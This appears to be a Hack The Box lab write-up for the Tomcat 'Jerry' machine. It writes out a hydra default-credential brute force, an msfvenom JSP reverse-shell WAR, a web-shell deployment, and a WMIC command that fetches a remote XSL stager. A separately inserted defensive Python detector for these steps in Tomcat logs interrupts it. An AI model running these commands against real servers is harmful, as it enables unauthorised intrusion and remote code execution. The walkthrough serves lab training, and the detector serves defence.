HTB Write-Up Jerry Windows
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/7.0.88
|_http-favicon: Apache Tomcat
Cannot log in to the Tomcat host manager page.
Look for a Tomcat wordlist.
hydra -C lets you use colon-separated "login:password" text files.
hydra -C /usr/share/seclists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http-get://10.129.161.193:8080/manager/html
The admin hit was a false positive.
Generate a payload with msfvenom:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.131 LPORT=5555 -f war > shell.war
We are already root!
Manual JSP shell - SILENTTRINITY - python
Get a JSP shell:
Follow the instructions for the host method:
Additional tip: remove the WAR file that came with the package and make your own with:
zip cmd.war cmd.jsp
This packs cmd.jsp into the cmd.war archive.
Finally, host the file over HTTP.
Go to the /manager/html page and deploy the cmd.war file.
Now when you browse to /cmd/cmd.jsp, we get a shell!
Execute commands with the syntax cmd /c COMMAND
Go to the server and start st.py.
Run "listeners" to enter listener mode and "list" what we have.
"use http" and set the BindIP,
then start the listener.
Once started, run stagers > list > use wmic > generate http
Plug the generated command into our JSP shell:
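As a defender's check on the two steps above (the hydra -C brute force of /manager/html and the WAR deployment through the manager app), here is an added example that is not from the write-up: it flags both patterns in Tomcat's default common-format access log. The log lines, user name and addresses are constructed.

```python
import re
from collections import defaultdict

# Tomcat's default "common" access-log pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$')

# Constructed sample lines (not from the write-up); addresses are TEST-NET ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.7 - tomcat [01/Jan/2024:10:00:03 +0000] "GET /manager/html HTTP/1.1" 200 19000
203.0.113.7 - tomcat [01/Jan/2024:10:00:10 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=X HTTP/1.1" 200 19500
198.51.100.9 - - [01/Jan/2024:10:01:00 +0000] "GET /docs/ HTTP/1.1" 200 1200
"""

def parse_access_log(text):
    """Parse common-format lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            e = m.groupdict()
            e["status"] = int(e["status"])
            entries.append(e)
    return entries

def detect_manager_bruteforce(entries, threshold=3):
    """Per source IP: count 401s on /manager/ and mark whether a 200 followed the burst."""
    stats = defaultdict(lambda: {"failures": 0, "succeeded": False})
    for e in entries:
        if not e["path"].startswith("/manager/"):
            continue
        if e["status"] == 401:
            stats[e["ip"]]["failures"] += 1
        elif e["status"] == 200 and stats[e["ip"]]["failures"] >= threshold:
            stats[e["ip"]]["succeeded"] = True  # credentials found after repeated failures
    return {ip: s for ip, s in stats.items() if s["failures"] >= threshold}

DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy")

def detect_war_deploy(entries):
    """Return (ip, user, path) for WAR uploads/deploys through the manager app."""
    hits = []
    for e in entries:
        path = e["path"].split("?", 1)[0]  # drop the CSRF nonce query string
        if e["method"] in ("POST", "PUT") and path.startswith(DEPLOY_PATHS):
            hits.append((e["ip"], e["user"], path))
    return hits
```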
C:\Windows\System32\wbem\WMIC.exe os get /format:"https://myurl/wmic.xsl"
Create a new www directory and move wmic.xsl there.
Since Tomcat requires a .js file, copy that over to the directory as well.
Hmm, didn't work. I'll come back to this.